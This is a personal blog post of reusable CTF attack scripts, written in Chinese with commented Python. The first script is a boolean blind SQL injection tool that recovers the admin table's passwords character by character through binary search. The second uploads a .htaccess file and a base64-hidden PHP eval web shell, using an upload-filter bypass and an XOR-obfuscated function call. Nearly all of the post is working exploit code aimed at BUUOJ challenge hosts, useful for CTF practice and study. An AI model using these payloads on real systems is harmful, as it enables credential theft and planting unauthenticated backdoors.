记录一下常用的一些脚本
SQL 布尔盲注（二分查找逐字符爆破）
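import requests
from time import sleep

# Target of the boolean-based blind injection (a throw-away BUUOJ CTF
# instance; point this at a host you are authorised to test).
url = "http://8fd845b8-4242-4441-ab34-57c8386d5faf.node3.buuoj.cn/backend/content_detail.php"

# Every request goes through a local intercepting proxy (Burp on 8080).  If
# nothing is listening there, requests raises ProxyError on the first call;
# set this to None to talk to the target directly.
proxies = {
    "http": "127.0.0.1:8080",
}

# Delay between oracle queries, to stay under the server's rate limit.
REQUEST_DELAY = 0.02
# How often a rate-limited (HTTP 429) query is retried before giving up.
MAX_RETRIES = 5


def attack(cur, mid=0):
    """Ask the blind-SQLi oracle whether character `cur` of the secret is > `mid`.

    The injected expression
    ``0^(ascii(substr((select group_concat(password) from admin),cur,1))>mid)``
    is sent as the ``id`` parameter; the page contains the word "content"
    exactly when the comparison is true.

    A 429 (rate limited) reply is NOT an oracle answer: the original printed
    "too fast" and then read the error page as False, which silently corrupts
    the recovered character.  Here the query is retried after a pause.

    Args:
        cur: 1-based position of the character (MySQL substr is 1-based).
        mid: ASCII threshold to compare against.  Defaults to 0, so a bare
            attack(i) asks "does position i exist?" (ascii('') is 0 in
            MySQL).  The original default of "" crashed on the %d format.

    Returns:
        True if ascii(char) > mid, False otherwise.

    Raises:
        RuntimeError: if the server keeps answering 429 after MAX_RETRIES.
    """
    payload = (
        "0^(ascii(substr((select(group_concat(password))from(admin)),%d,1))>%d)"
        % (cur, mid)
    )
    data = {"id": payload}
    for _ in range(MAX_RETRIES):
        res = requests.get(url, params=data, proxies=proxies)
        if res.status_code != 429:
            # True branch renders the page with "content" in it; anything
            # else (including other error pages) counts as False.
            return "content" in res.text
        # Back off and retry instead of treating the 429 page as False.
        print("too fast")
        sleep(REQUEST_DELAY * 10)
    raise RuntimeError(
        "still rate limited after %d retries at position %d" % (MAX_RETRIES, cur)
    )


def try_length(max_len=10):
    """Probe how many characters the secret has.

    Uses attack(i) with the default threshold 0: the oracle answers True
    while position i exists and False for the first position past the end
    (ascii('') is 0 in MySQL).  The original printed the first position that
    *does* exist -- always 1 -- and could not run anyway because its default
    threshold was the string "".

    Args:
        max_len: positions 1..max_len-1 are probed (the original's range).

    Returns:
        The detected length, or None if every probed position exists (the
        secret is at least max_len-1 characters long; raise max_len).
    """
    for i in range(1, max_len):
        if not attack(i):
            print(i - 1)
            return i - 1
        sleep(REQUEST_DELAY)
    return None


def _search_char(pos, lo=31, hi=127):
    """Binary-search the ASCII value of character `pos` through the oracle.

    Invariant: lo <= ascii(char) <= hi.  attack(pos, mid) True means the
    character is > mid, so the lower bound moves to mid + 1; otherwise it is
    <= mid and the upper bound moves down to mid.  When lo == hi the value
    is known.  A character outside [lo, hi] is misread as the nearest bound,
    so widen the range if the output looks wrong.
    """
    while hi > lo:
        mid = (lo + hi) // 2
        if attack(pos, mid):
            lo = mid + 1  # char > mid
        else:
            hi = mid  # char <= mid
        sleep(REQUEST_DELAY)
    return lo


def main(positions=range(1, 22)):
    """Recover the secret character by character, printing progress.

    Args:
        positions: 1-based positions to recover, in order.  The default
            (1..21) is the length the original hard-coded; run try_length()
            first when the length is unknown.
    """
    flag = ""
    for pos in positions:
        flag += chr(_search_char(pos))
        print(flag)


if __name__ == "__main__":
    main()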
SSTI 判断图
.htaccess 上传 getshell
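import base64

import requests

# Upload endpoint of the challenge instance.  The query string is a
# "no alphanumerics" PHP trick: XOR-ing %fe%fe%fe%fe with %a1%b9%bb%aa byte
# by byte gives 0x5f 0x47 0x45 0x54 = "_GET", so `${...}{%fe}();` calls the
# function whose name is in the `%fe` GET parameter -- here get_the_flag,
# which is the server-side upload handler.
url = r"http://2eab5f94-4cfd-41dc-ac5d-6cda977d7ce4.node3.buuoj.cn//?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"

# Bytes prepended to every upload so it passes the server's image check
# (presumably getimagesize(); this looks like a WBMP header -- confirm
# against the challenge).  Note that 0x39 is ASCII '9', which matters for
# the base64 alignment of the shell below.
SIZE_HEADER = b"\x00\x00\x8a\x39\x8a\x39"

# Per-client upload directory on the target.  It is instance-specific: take
# it from the server's response to the first upload and adjust it here.
UPLOAD_DIR = "/var/www/html/upload/tmp_2c67ca1eaeadbdc1868d67003072b481"

# Apache per-directory config: run .cc files as PHP, and prepend shell.cc --
# passed through PHP's lenient base64-decode filter -- to every PHP request
# in the directory.
htaccess = SIZE_HEADER + (
    b"\n"
    b"AddType application/x-httpd-php .cc\n"
    b"php_value auto_prepend_file \"php://filter/convert.base64-decode/resource="
    + UPLOAD_DIR.encode()
    + b"/shell.cc\"\n"
)

# The shell runs whatever PHP is passed in the `cjm00n` GET parameter --
# an unauthenticated backdoor; remove it from the target when done.
# The file is stored base64-encoded so the raw bytes contain no "<?php".
# The decode filter skips non-alphabet bytes, so of SIZE_HEADER only the
# two '9's survive; "00" pads them to one 4-character group, presumably so
# the real payload decodes on a clean boundary.
shell = SIZE_HEADER + b"00" + base64.b64encode(b"<?php eval($_GET['cjm00n']);?>")

# Local intercepting proxy (Burp).  requests raises ProxyError if nothing
# listens on 127.0.0.1:8080; set to None to go direct.
proxy = {"http": "127.0.0.1:8080"}


def upload(filename, content, mime="image/gif"):
    """POST one file to the upload endpoint and return the response body.

    Args:
        filename: name the server stores the part under.
        content: raw bytes of the file.
        mime: Content-Type claimed for the part; the image MIME is part of
            the upload-filter bypass, together with SIZE_HEADER.
    """
    files = [("file", (filename, content, mime))]
    return requests.post(url, files=files, proxies=proxy).text


def main():
    """Drop the .htaccess first, then the shell it references."""
    print(upload(".htaccess", htaccess))
    print(upload("shell.cc", shell))


if __name__ == "__main__":
    main()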
作者: cjm00n 地址: https://cjm00n.top/CTF/useful-scripts.html 版权声明: 除特别说明外,所有文章均采用 CC BY 4.0 许可协议,转载请先取得同意。